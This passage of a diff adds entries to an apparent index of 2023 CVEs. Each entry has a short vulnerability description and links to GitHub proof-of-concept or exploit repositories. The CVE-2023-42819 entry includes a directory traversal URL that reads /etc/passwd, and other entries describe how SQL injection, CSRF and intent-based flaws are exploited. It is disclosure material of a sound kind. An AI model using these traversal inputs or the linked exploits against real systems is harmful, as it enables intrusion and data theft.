+- [BugBountyHunterCVE/CVE-2023-40278](https://github.com/BugBountyHunterCVE/CVE-2023-40278)
+
+### CVE-2023-40279 (2024-03-19)
+
+An issue was discovered in OpenClinic GA 5.247.01. An attacker can perform a directory path traversal via the Page parameter in a GET request to main.do.
+
+
+- [BugBountyHunterCVE/CVE-2023-40279](https://github.com/BugBountyHunterCVE/CVE-2023-40279)
+
+### CVE-2023-40280 (2024-03-19)
+
+An issue was discovered in OpenClinic GA 5.247.01. An attacker can perform a directory path traversal via the Page parameter in a GET request to popup.jsp.
+
+
+- [BugBountyHunterCVE/CVE-2023-40280](https://github.com/BugBountyHunterCVE/CVE-2023-40280)
+
+### CVE-2023-40294 (2023-08-14)
+
+libboron in Boron 2.0.8 has a heap-based buffer overflow in ur_parseBlockI at i_parse_blk.c.
+
+
+- [Halcy0nic/CVE-2023-40294-and-CVE-2023-40295](https://github.com/Halcy0nic/CVE-2023-40294-and-CVE-2023-40295)
+
+### CVE-2023-40296 (2023-08-14)
+
+async-sockets-cpp through 0.3.1 has a stack-based buffer overflow in ReceiveFrom and Receive in udpsocket.hpp when processing malformed UDP packets.
+
+
+- [Halcy0nic/CVE-2023-40296](https://github.com/Halcy0nic/CVE-2023-40296)
+
+### CVE-2023-40297 (-)
+
+Stakater Forecastle 1.0.139 and before allows %5C../ directory traversal in the website component.
+
+
+- [sahar042/CVE-2023-40297](https://github.com/sahar042/CVE-2023-40297)
+
+### CVE-2023-40361 (2023-10-20)
+
+SECUDOS Qiata (DOMOS OS) 4.13 has Insecure Permissions for the previewRm.sh daily cronjob. To exploit this, an attacker needs access as a low-privileged user to the underlying DOMOS system. Every user on the system has write permission for previewRm.sh, which is executed by the root user.
+
+
+- [vianic/CVE-2023-40361](https://github.com/vianic/CVE-2023-40361)
+
+### CVE-2023-40362 (2024-01-12)
+
+An issue was discovered in CentralSquare Click2Gov Building Permit before October 2023. Lack of access control protections allows remote attackers to arbitrarily delete the contractors from any user's account when the user ID and contractor information is known.
+
+
+- [ally-petitt/CVE-2023-40362](https://github.com/ally-petitt/CVE-2023-40362)
+
+### CVE-2023-40429 (2023-09-26)
+
+A permissions issue was addressed with improved validation. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, watchOS 10, macOS Sonoma 14. An app may be able to access sensitive user data.
+
+
+- [biscuitehh/cve-2023-40429-ez-device-name](https://github.com/biscuitehh/cve-2023-40429-ez-device-name)
+
+### CVE-2023-40459 (2023-12-04)
+
+\n\n\n\n\n\n\n\n\nThe\nACEManager component of ALEOS 4.16 and earlier does not adequately perform\ninput sanitization during authentication, which could potentially result in a\nDenial of Service (DoS) condition for ACEManager without impairing other router\nfunctions. ACEManager recovers from the DoS condition by restarting within ten\nseconds of becoming unavailable.\n\n\n\n\n\n\n
+
+
+- [majidmc2/CVE-2023-40459](https://github.com/majidmc2/CVE-2023-40459)
+
+### CVE-2023-40477 (2024-05-03)
+
+RARLAB WinRAR Recovery Volume Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of RARLAB WinRAR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the processing of recovery volumes. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21233.
+
+
+- [winkler-winsen/Scan_WinRAR](https://github.com/winkler-winsen/Scan_WinRAR)
+- [wildptr-io/Winrar-CVE-2023-40477-POC](https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC)
+
+### CVE-2023-40600 (2023-11-30)
+
+Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Exactly WWW EWWW Image Optimizer. It works only when debug.log is turned on.This issue affects EWWW Image Optimizer: from n/a through 7.2.0.\n\n
+
+
+- [RandomRobbieBF/CVE-2023-40600](https://github.com/RandomRobbieBF/CVE-2023-40600)
+
+### CVE-2023-40626 (2023-11-29)
+
+The language file parsing process could be manipulated to expose environment variables. Environment variables might contain sensible information.
+
+
+- [TLWebdesign/Joomla-3.10.12-languagehelper-hotfix](https://github.com/TLWebdesign/Joomla-3.10.12-languagehelper-hotfix)
+
+### CVE-2023-40868 (2023-09-14)
+
+Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions.
+
+
+- [MinoTauro2020/CVE-2023-40868](https://github.com/MinoTauro2020/CVE-2023-40868)
+
+### CVE-2023-40869 (2023-09-14)
+
+Cross Site Scripting vulnerability in mooSocial mooSocial Software 3.1.6 and 3.1.7 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions.
+
+
+- [MinoTauro2020/CVE-2023-40869](https://github.com/MinoTauro2020/CVE-2023-40869)
+
+### CVE-2023-40924 (2023-09-08)
+
+SolarView Compact < 6.00 is vulnerable to Directory Traversal.
+
+
+- [Yobing1/CVE-2023-40924](https://github.com/Yobing1/CVE-2023-40924)
+
+### CVE-2023-40930 (2023-09-20)
+
+An issue in the directory /system/bin/blkid of Skyworth v3.0 allows attackers to perform a directory traversal via mounting the Udisk to /mnt/.
+
+
+- [NSnidie/CVE-2023-40930](https://github.com/NSnidie/CVE-2023-40930)
+
+### CVE-2023-40931 (2023-09-19)
+
+A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php
+
+
+- [sealldeveloper/CVE-2023-40931-PoC](https://github.com/sealldeveloper/CVE-2023-40931-PoC)
+
+### CVE-2023-40933 (2023-09-19)
+
+A SQL injection vulnerability in Nagios XI v5.11.1 and below allows authenticated attackers with announcement banner configuration privileges to execute arbitrary SQL commands via the ID parameter sent to the update_banner_message() function.
+
+
+- [sealldeveloper/CVE-2023-40933-PoC](https://github.com/sealldeveloper/CVE-2023-40933-PoC)
+
+### CVE-2023-40989 (2023-09-22)
+
+SQL injection vulnerbility in jeecgboot jeecg-boot v 3.0, 3.5.3 that allows a remote attacker to execute arbitrary code via a crafted request to the report/jeecgboot/jmreport/queryFieldBySql component.
+
+
+- [Zone1-Z/CVE-2023-40989](https://github.com/Zone1-Z/CVE-2023-40989)
+
+### CVE-2023-41064 (2023-09-07)
+
+A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 16.6.1 and iPadOS 16.6.1, macOS Monterey 12.6.9, macOS Ventura 13.5.2, iOS 15.7.9 and iPadOS 15.7.9, macOS Big Sur 11.7.10. Processing a maliciously crafted image may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
+
+
+- [MrR0b0t19/vulnerabilidad-LibWebP-CVE-2023-41064](https://github.com/MrR0b0t19/vulnerabilidad-LibWebP-CVE-2023-41064)
+- [MrR0b0t19/CVE-2023-41064](https://github.com/MrR0b0t19/CVE-2023-41064)
+- [alsaeroth/CVE-2023-41064-POC](https://github.com/alsaeroth/CVE-2023-41064-POC)
+
+### CVE-2023-41080 (2023-08-25)
+
+URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92.\n\nThe vulnerability is limited to the ROOT (default) web application.
+
+
+- [shiomiyan/CVE-2023-41080](https://github.com/shiomiyan/CVE-2023-41080)
+
+### CVE-2023-41105 (2023-08-23)
+
+An issue was discovered in Python 3.11 through 3.11.4. If a path containing '\0' bytes is passed to os.path.normpath(), the path will be truncated unexpectedly at the first '\0' byte. There are plausible cases in which an application would have rejected a filename for security reasons in Python 3.10.x or earlier, but that filename is no longer rejected in Python 3.11.x.
+
+
+- [JawadPy/CVE-2023-41105-Exploit](https://github.com/JawadPy/CVE-2023-41105-Exploit)
+
+### CVE-2023-41265 (2023-08-29)
+
+An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows a remote attacker to elevate their privilege by tunneling HTTP requests in the raw HTTP request. This allows them to send requests that get executed by the backend server hosting the repository application. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.
+
+
+- [praetorian-inc/zeroqlik-detect](https://github.com/praetorian-inc/zeroqlik-detect)
+
+### CVE-2023-41362 (2023-08-29)
+
+MyBB before 1.8.36 allows Code Injection by users with certain high privileges. Templates in Admin CP intentionally use eval, and there was some validation of the input to eval, but type juggling interfered with this when using PCRE within PHP.
+
+
+- [SorceryIE/CVE-2023-41362_MyBB_ACP_RCE](https://github.com/SorceryIE/CVE-2023-41362_MyBB_ACP_RCE)
+
+### CVE-2023-41425 (2023-11-07)
+
+Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.
+
+
+- [prodigiousMind/CVE-2023-41425](https://github.com/prodigiousMind/CVE-2023-41425)
+
+### CVE-2023-41436 (2023-09-15)
+
+Cross Site Scripting vulnerability in CSZCMS v.1.3.0 allows a local attacker to execute arbitrary code via a crafted script to the Additional Meta Tag parameter in the Pages Content Menu component.
+
+
+- [sromanhu/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content](https://github.com/sromanhu/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content)
+
+### CVE-2023-41474 (2024-01-25)
+
+Directory Traversal vulnerability in Ivanti Avalanche 6.3.4.153 allows a remote authenticated attacker to obtain sensitive information via the javax.faces.resource component.
+
+
+- [JBalanza/CVE-2023-41474](https://github.com/JBalanza/CVE-2023-41474)
+
+### CVE-2023-41507 (2023-09-05)
+
+Super Store Finder v3.6 was discovered to contain multiple SQL injection vulnerabilities in the store locator component via the products, distance, lat, and lng parameters.
+
+
+- [redblueteam/CVE-2023-41507](https://github.com/redblueteam/CVE-2023-41507)
+
+### CVE-2023-41508 (2023-09-05)
+
+A hard coded password in Super Store Finder v3.6 allows attackers to access the administration panel.
+
+
+- [redblueteam/CVE-2023-41508](https://github.com/redblueteam/CVE-2023-41508)
+
+### CVE-2023-41533
+- [Sh33talUmath/CVE-2023-41533](https://github.com/Sh33talUmath/CVE-2023-41533)
+
+### CVE-2023-41534
+- [Sh33talUmath/CVE-2023-41534](https://github.com/Sh33talUmath/CVE-2023-41534)
+
+### CVE-2023-41535
+- [Sh33talUmath/CVE-2023-41535](https://github.com/Sh33talUmath/CVE-2023-41535)
+
+### CVE-2023-41575 (2023-09-08)
+
+Multiple stored cross-site scripting (XSS) vulnerabilities in /bbdms/sign-up.php of Blood Bank & Donor Management v2.2 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Full Name, Message, or Address parameters.
+
+
+- [soundarkutty/Stored-xss](https://github.com/soundarkutty/Stored-xss)
+
+### CVE-2023-41592 (2023-09-14)
+
+Froala Editor v4.0.1 to v4.1.1 was discovered to contain a cross-site scripting (XSS) vulnerability.
+
+
+- [miguelc49/CVE-2023-41592-2](https://github.com/miguelc49/CVE-2023-41592-2)
+- [miguelc49/CVE-2023-41592-1](https://github.com/miguelc49/CVE-2023-41592-1)
+- [miguelc49/CVE-2023-41592-3](https://github.com/miguelc49/CVE-2023-41592-3)
+
+### CVE-2023-41593 (2023-09-11)
+
+Multiple cross-site scripting (XSS) vulnerabilities in Dairy Farm Shop Management System Using PHP and MySQL v1.1 allow attackers to execute arbitrary web scripts and HTML via a crafted payload injected into the Category and Category Field parameters.
+
+
+- [MATRIXDEVIL/CVE](https://github.com/MATRIXDEVIL/CVE)
+
+### CVE-2023-41613 (2023-12-04)
+
+EzViz Studio v2.2.0 is vulnerable to DLL hijacking.
+
+
+- [Eafz/cve-2023-41613](https://github.com/Eafz/cve-2023-41613)
+
+### CVE-2023-41623 (2023-12-12)
+
+Emlog version pro2.1.14 was discovered to contain a SQL injection vulnerability via the uid parameter at /admin/media.php.
+
+
+- [GhostBalladw/wuhaozhe-s-CVE](https://github.com/GhostBalladw/wuhaozhe-s-CVE)
+
+### CVE-2023-41646 (2023-09-07)
+
+Buttercup v2.20.3 allows attackers to obtain the hash of the master password for the password manager via accessing the file /vaults.json/
+
+
+- [tristao-marinho/CVE-2023-41646](https://github.com/tristao-marinho/CVE-2023-41646)
+
+### CVE-2023-41717 (2023-08-31)
+
+Inappropriate file type control in Zscaler Proxy versions 3.6.1.25 and prior allows local attackers to bypass file download/upload restrictions.
+
+
+- [federella/CVE-2023-41717](https://github.com/federella/CVE-2023-41717)
+
+### CVE-2023-41772 (2023-10-10)
+
+Win32k Elevation of Privilege Vulnerability
+
+
+- [R41N3RZUF477/CVE-2023-41772](https://github.com/R41N3RZUF477/CVE-2023-41772)
+
+### CVE-2023-41892 (2023-09-13)
+
+Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector. Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.
+
+
+- [zaenhaxor/CVE-2023-41892](https://github.com/zaenhaxor/CVE-2023-41892)
+- [Faelian/CraftCMS_CVE-2023-41892](https://github.com/Faelian/CraftCMS_CVE-2023-41892)
+- [diegaccio/Craft-CMS-Exploit](https://github.com/diegaccio/Craft-CMS-Exploit)
+- [acesoyeo/CVE-2023-41892](https://github.com/acesoyeo/CVE-2023-41892)
+
+### CVE-2023-41991 (2023-09-21)
+
+A certificate validation issue was addressed. This issue is fixed in macOS Ventura 13.6, iOS 16.7 and iPadOS 16.7. A malicious app may be able to bypass signature validation. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.
+
+
+- [Zenyith/CVE-2023-41991](https://github.com/Zenyith/CVE-2023-41991)
+
+### CVE-2023-41993 (2023-09-21)
+
+The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.
+
+
+- [po6ix/POC-for-CVE-2023-41993](https://github.com/po6ix/POC-for-CVE-2023-41993)
+- [hrtowii/cve-2023-41993-test](https://github.com/hrtowii/cve-2023-41993-test)
+- [Mangaia/cve-test](https://github.com/Mangaia/cve-test)
+- [J3Ss0u/CVE-2023-41993](https://github.com/J3Ss0u/CVE-2023-41993)
+
+### CVE-2023-42222 (2023-09-28)
+
+WebCatalog before 49.0 is vulnerable to Incorrect Access Control. WebCatalog calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource, in some circumstances.
+
+
+- [itssixtyn3in/CVE-2023-42222](https://github.com/itssixtyn3in/CVE-2023-42222)
+
+### CVE-2023-42283 (2023-11-07)
+
+Blind SQL injection in api_id parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query.
+
+
+- [andreysanyuk/CVE-2023-42283](https://github.com/andreysanyuk/CVE-2023-42283)
+
+### CVE-2023-42284 (2023-11-07)
+
+Blind SQL injection in api_version parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query.
+
+
+- [andreysanyuk/CVE-2023-42284](https://github.com/andreysanyuk/CVE-2023-42284)
+
+### CVE-2023-42362 (2023-09-14)
+
+An arbitrary file upload vulnerability in Teller Web App v.4.4.0 allows a remote attacker to execute arbitrary commands and obtain sensitive information via uploading a crafted file.
+
+
+- [Mr-n0b3dy/CVE-2023-42362](https://github.com/Mr-n0b3dy/CVE-2023-42362)
+
+### CVE-2023-42413
+- [chenghao-hao/cve-2023-42413](https://github.com/chenghao-hao/cve-2023-42413)
+
+### CVE-2023-42426 (2023-09-25)
+
+Cross-site scripting (XSS) vulnerability in Froala Froala Editor v.4.1.1 allows remote attackers to execute arbitrary code via the 'Insert link' parameter in the 'Insert Image' component.
+
+
+- [b0marek/CVE-2023-42426](https://github.com/b0marek/CVE-2023-42426)
+
+### CVE-2023-42442 (2023-09-15)
+
+JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n
+
+
+- [HolyGu/CVE-2023-42442](https://github.com/HolyGu/CVE-2023-42442)
+- [tarihub/blackjump](https://github.com/tarihub/blackjump)
+- [C1ph3rX13/CVE-2023-42442](https://github.com/C1ph3rX13/CVE-2023-42442)
+
+### CVE-2023-42468 (2023-09-13)
+
+The com.cutestudio.colordialer application through 2.1.8-2 for Android allows a remote attacker to initiate phone calls without user consent, because of improper export of the com.cutestudio.dialer.activities.DialerActivity component. A third-party application (without any permissions) can craft an intent targeting com.cutestudio.dialer.activities.DialerActivity via the android.intent.action.CALL action in conjunction with a tel: URI, thereby placing a phone call.
+
+
+- [actuator/com.cutestudio.colordialer](https://github.com/actuator/com.cutestudio.colordialer)
+
+### CVE-2023-42469 (2023-09-13)
+
+The com.full.dialer.top.secure.encrypted application through 1.0.1 for Android enables any installed application (with no permissions) to place phone calls without user interaction by sending a crafted intent via the com.full.dialer.top.secure.encrypted.activities.DialerActivity component.
+
+
+- [actuator/com.full.dialer.top.secure.encrypted](https://github.com/actuator/com.full.dialer.top.secure.encrypted)
+
+### CVE-2023-42470 (2023-09-11)
+
+The Imou Life com.mm.android.smartlifeiot application through 6.8.0 for Android allows Remote Code Execution via a crafted intent to an exported component. This relates to the com.mm.android.easy4ip.MainActivity activity. JavaScript execution is enabled in the WebView, and direct web content loading occurs.
+
+
+- [actuator/imou](https://github.com/actuator/imou)
+
+### CVE-2023-42471 (2023-09-11)
+
+The wave.ai.browser application through 1.0.35 for Android allows a remote attacker to execute arbitrary JavaScript code via a crafted intent. It contains a manifest entry that exports the wave.ai.browser.ui.splash.SplashScreen activity. This activity uses a WebView component to display web content and doesn't adequately validate or sanitize the URI or any extra data passed in the intent by a third party application (with no permissions).
+
+
+- [actuator/wave.ai.browser](https://github.com/actuator/wave.ai.browser)
+
+### CVE-2023-42789 (2024-03-12)
+
+A out-of-bounds write in Fortinet FortiOS 7.4.0 through 7.4.1, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, FortiProxy 7.4.0, 7.2.0 through 7.2.6, 7.0.0 through 7.0.12, 2.0.0 through 2.0.13 allows attacker to execute unauthorized code or commands via specially crafted HTTP requests.
+
+
+- [jhonnybonny/CVE-2023-42789](https://github.com/jhonnybonny/CVE-2023-42789)
+
+### CVE-2023-42793 (2023-09-19)
+
+In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible
+
+
+- [H454NSec/CVE-2023-42793](https://github.com/H454NSec/CVE-2023-42793)
+- [Zenmovie/CVE-2023-42793](https://github.com/Zenmovie/CVE-2023-42793)
+- [johnossawy/CVE-2023-42793_POC](https://github.com/johnossawy/CVE-2023-42793_POC)
+- [StanleyJobsonAU/GhostTown](https://github.com/StanleyJobsonAU/GhostTown)
+- [hotplugin0x01/CVE-2023-42793](https://github.com/hotplugin0x01/CVE-2023-42793)
+- [Zyad-Elsayed/CVE-2023-42793](https://github.com/Zyad-Elsayed/CVE-2023-42793)
+- [junnythemarksman/CVE-2023-42793](https://github.com/junnythemarksman/CVE-2023-42793)
+
+### CVE-2023-42819 (2023-09-26)
+
+JumpServer is an open source bastion host. Logged-in users can access and modify the contents of any file on the system. A user can use the 'Job-Template' menu and create a playbook named 'test'. Get the playbook id from the detail page, like 'e0adabef-c38f-492d-bd92-832bacc3df5f'. An attacker can exploit the directory traversal flaw using the provided URL to access and retrieve the contents of the file. `https://jumpserver-ip/api/v1/ops/playbook/e0adabef-c38f-492d-bd92-832bacc3df5f/file/?key=../../../../../../../etc/passwd` a similar method to modify the file content is also present. This issue has been addressed in version 3.6.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n
+
+
+- [C1ph3rX13/CVE-2023-42819](https://github.com/C1ph3rX13/CVE-2023-42819)
+
+### CVE-2023-42820 (2023-09-26)
+
+JumpServer is an open source bastion host. This vulnerability is due to exposing the random number seed to the API, potentially allowing the randomly generated verification codes to be replayed, which could lead to password resets. If MFA is enabled users are not affect. Users not using local authentication are also not affected. Users are advised to upgrade to either version 2.28.19 or to 3.6.5. There are no known workarounds or this issue.
+
+
+- [C1ph3rX13/CVE-2023-42820](https://github.com/C1ph3rX13/CVE-2023-42820)
+- [Startr4ck/cve-2023-42820](https://github.com/Startr4ck/cve-2023-42820)
+
+### CVE-2023-42860 (2024-02-21)
+
+A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. An app may be able to modify protected parts of the file system.
+
+
+- [Trigii/CVE-2023-42860](https://github.com/Trigii/CVE-2023-42860)
+
+### CVE-2023-42931 (2024-03-28)
+
+The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6.3, macOS Sonoma 14.2, macOS Monterey 12.7.2. A process may gain admin privileges without proper authentication.
+
+
+- [d0rb/CVE-2023-42931](https://github.com/d0rb/CVE-2023-42931)
+
+### CVE-2023-43115 (2023-09-18)
+
+In Artifex Ghostscript through 10.01.2, gdevijs.c in GhostPDL can lead to remote code execution via crafted PostScript documents because they can switch to the IJS device, or change the IjsServer parameter, after SAFER has been activated. NOTE: it is a documented risk that the IJS server can be specified on a gs command line (the IJS device inherently must execute a command to start the IJS server).
+
+
+- [jostaub/ghostscript-CVE-2023-43115](https://github.com/jostaub/ghostscript-CVE-2023-43115)
+
+### CVE-2023-43144 (2023-09-22)
+
+Projectworldsl Assets-management-system-in-php 1.0 is vulnerable to SQL Injection via the "id" parameter in delete.php.
+
+
+- [Pegasus0xx/CVE-2023-43144](https://github.com/Pegasus0xx/CVE-2023-43144)
+
+### CVE-2023-43147 (2023-10-12)
+
+PHPJabbers Limo Booking Software 1.0 is vulnerable to Cross Site Request Forgery (CSRF) to add an admin user via the Add Users Function, aka an index.php?controller=pjAdminUsers&action=pjActionCreate URI.
+
+
+- [MinoTauro2020/CVE-2023-43147](https://github.com/MinoTauro2020/CVE-2023-43147)
+
+### CVE-2023-43148 (2023-10-12)
+
+SPA-Cart 1.9.0.3 has a Cross Site Request Forgery (CSRF) vulnerability that allows a remote attacker to delete all accounts.
+
+
+- [MinoTauro2020/CVE-2023-43148](https://github.com/MinoTauro2020/CVE-2023-43148)
+
+### CVE-2023-43149 (2023-10-12)
+
+SPA-Cart 1.9.0.3 is vulnerable to Cross Site Request Forgery (CSRF) that allows a remote attacker to add an admin user with role status.
+
+
+- [MinoTauro2020/CVE-2023-43149](https://github.com/MinoTauro2020/CVE-2023-43149)
+
+### CVE-2023-43154 (2023-09-26)
+
+In Macrob7 Macs Framework Content Management System (CMS) 1.1.4f, loose comparison in "isValidLogin()" function during login attempt results in PHP type confusion vulnerability that leads to authentication bypass and takeover of the administrator account.
+
+
+- [ally-petitt/CVE-2023-43154-PoC](https://github.com/ally-petitt/CVE-2023-43154-PoC)
+
+### CVE-2023-43177 (2023-11-17)
+
+CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
+
+
+- [the-emmons/CVE-2023-43177](https://github.com/the-emmons/CVE-2023-43177)
+
+### CVE-2023-43208 (2023-10-26)
+
+NextGen Healthcare Mirth Connect before version 4.4.1 is vulnerable to unauthenticated remote code execution. Note that this vulnerability is caused by the incomplete patch of CVE-2023-37679.
+
+
+- [K3ysTr0K3R/CVE-2023-43208-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-43208-EXPLOIT)
+- [jakabakos/CVE-2023-43208-mirth-connect-rce-poc](https://github.com/jakabakos/CVE-2023-43208-mirth-connect-rce-poc)
+- [J4F9S5D2Q7/CVE-2023-43208-MIRTHCONNECT](https://github.com/J4F9S5D2Q7/CVE-2023-43208-MIRTHCONNECT)
+
+### CVE-2023-43261 (2023-10-04)
+
+An information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 allows attackers to access sensitive router components.
+
+
+- [win3zz/CVE-2023-43261](https://github.com/win3zz/CVE-2023-43261)
+
+### CVE-2023-43263 (2023-09-26)
+
+A Cross-site scripting (XSS) vulnerability in Froala Editor v.4.1.1 allows attackers to execute arbitrary code via the Markdown component.
+
+
+- [b0marek/CVE-2023-43263](https://github.com/b0marek/CVE-2023-43263)
+
+### CVE-2023-43284 (2023-10-05)
+
+D-Link Wireless MU-MIMO Gigabit AC1200 Router DIR-846 100A53DBR-Retail devices allow an authenticated remote attacker to execute arbitrary code via an unspecified manipulation of the QoS POST parameter.
+
+
+- [MateusTesser/CVE-2023-43284](https://github.com/MateusTesser/CVE-2023-43284)
+
+### CVE-2023-43317 (2024-01-24)
+
+An issue in Coign CRM Portal v.06.06 allows a remote attacker to escalate privileges via the userPermissionsList parameter in Session Storage component.
+
+
+- [amjadali-110/CVE-2023-43317](https://github.com/amjadali-110/CVE-2023-43317)
+
+### CVE-2023-43318 (2024-03-05)
+
+TP-Link JetStream Smart Switch TL-SG2210P 5.0 Build 20211201 allows attackers to escalate privileges via modification of the 'tid' and 'usrlvl' values in GET requests.
+
+
+- [str2ver/CVE-2023-43318](https://github.com/str2ver/CVE-2023-43318)
+
+### CVE-2023-43323 (2023-09-28)
+
+mooSocial 3.1.8 is vulnerable to external service interaction on post function. When executed, the server sends a HTTP and DNS request to external server. The Parameters effected are multiple - messageText, data[wall_photo], data[userShareVideo] and data[userShareLink].
+
+
+- [ahrixia/CVE-2023-43323](https://github.com/ahrixia/CVE-2023-43323)
+
+### CVE-2023-43325 (2023-09-25)
+
+A reflected cross-site scripting (XSS) vulnerability in the data[redirect_url] parameter of mooSocial v3.1.8 allows attackers to steal user's session cookies and impersonate their account via a crafted URL.
+
+
+- [ahrixia/CVE-2023-43325](https://github.com/ahrixia/CVE-2023-43325)
+
+### CVE-2023-43326 (2023-09-25)
+
+A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 allows attackers to steal user's session cookies and impersonate their account via a crafted URL.
+
+
+- [ahrixia/CVE-2023-43326](https://github.com/ahrixia/CVE-2023-43326)
+
+### CVE-2023-43339 (2023-09-25)
+
+Cross-Site Scripting (XSS) vulnerability in cmsmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted payload injected into the Database Name, DataBase User or Database Port components.
+
+
+- [sromanhu/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation](https://github.com/sromanhu/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation)
+
+### CVE-2023-43340 (2023-10-19)
+
+Cross-site scripting (XSS) vulnerability in evolution v.3.2.3 allows a local attacker to execute arbitrary code via a crafted payload injected into the cmsadmin, cmsadminemail, cmspassword and cmspasswordconfim parameters
+
+
+- [sromanhu/-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options](https://github.com/sromanhu/-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options)
+
+### CVE-2023-43341 (2023-10-19)
+
+Cross-site scripting (XSS) vulnerability in evolution evo v.3.2.3 allows a local attacker to execute arbitrary code via a crafted payload injected uid parameter.
+
+
+- [sromanhu/CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-](https://github.com/sromanhu/CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-)
+
+### CVE-2023-43342 (2023-10-19)
+
+Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Languages Menu component.
+
+
+- [sromanhu/CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend](https://github.com/sromanhu/CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend)
+
+### CVE-2023-43343 (2023-10-05)
+
+Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Files - Description parameter in the Pages Menu component.
+
+
+- [sromanhu/CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files](https://github.com/sromanhu/CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files)
+
+### CVE-2023-43344 (2023-10-19)
+
+Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the SEO - Meta description parameter in the Pages Menu component.
+
+
+- [sromanhu/CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description](https://github.com/sromanhu/CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description)
+
+### CVE-2023-43345 (2023-10-19)
+
+Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Content - Name parameter in the Pages Menu component.
+
+
+- [sromanhu/CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content](https://github.com/sromanhu/CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content)
+
+### CVE-2023-43346 (2023-10-20)
+
+Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Backend - Dashboard parameter in the Languages Menu component.
+
+
+- [sromanhu/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend](https://github.com/sromanhu/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend)
+
+### CVE-2023-43352 (2023-10-26)
+
